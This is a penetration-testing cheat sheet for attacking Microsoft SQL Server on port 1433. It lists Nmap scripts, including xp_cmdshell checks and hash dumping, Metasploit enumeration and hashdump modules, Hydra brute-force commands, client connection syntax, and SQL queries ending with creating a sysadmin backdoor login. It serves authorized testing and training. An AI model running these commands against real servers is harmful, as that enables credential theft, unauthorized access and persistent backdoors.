Ms-SQL 1433

1. Nmap for MSSQL Enumeration:

  • Search for related Nmap scripts:

    nmap --script-help "ms and sql"

  • Run Nmap with selected MSSQL scripts:

    nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

  • Run specific MSSQL scripts:

    nmap --script ms-sql-info -p 1433 10.0.0.0
nmap --script ms-sql-config -p 1433 10.0.0.0
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
nmap --script ms-sql-* -p 1433 10.0.0.0

2. Metasploit Modules for MSSQL:

  • Common MSSQL Metasploit modules:

    msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

  • These modules allow you to:

    • Enumerate MSSQL logins and domain accounts.

    • Dump hashes and retrieve database schema.

3. Bruteforcing MSSQL with Hydra:

  • Bruteforce with a username list:

    hydra -L usernames.txt -p password 10.0.0.0 mssql

  • Bruteforce with a password list:

    hydra -l username -P passwords.txt 10.0.0.0 mssql

4. Connecting to MSSQL with Impacket:

  • SQL Authentication:

    impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>

  • Windows Authentication:

    impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

5. Connecting to MSSQL with sqsh:

  • Basic connection:

    sqsh -S <target-ip> -U username -P password

  • Connect to a specific database:

    sqsh -S <target-ip> -U username -P password -D database

6. SQL Commands for Enumeration:

  • Get all users:

    SELECT * FROM sys.database_principals;

  • Switch to a specific database:

    USE <database>;

  • List available databases:

    SELECT * FROM master.dbo.sysdatabases;

  • List tables within a database:

    SELECT * FROM information_schema.tables;

  • Get content from a table:

    SELECT * FROM <database_name>.dbo.<table_name>;

  • Get the MSSQL version:

    SELECT @@version;

  • Check permission to execute OS commands:

    USE master;
EXEC sp_helprotect 'xp_cmdshell';

  • Get linked servers:

    EXEC sp_linkedservers;
SELECT * FROM sys.servers;

  • Create a new user with sysadmin privileges:

    CREATE LOGIN tester WITH PASSWORD = 'password';
EXEC sp_addsrvrolemember 'tester', 'sysadmin';

  • Get the current username:

    SELECT user_name();
PreviousOpenSSL 1337NextOracle Listener 1521 1522 1529

Last updated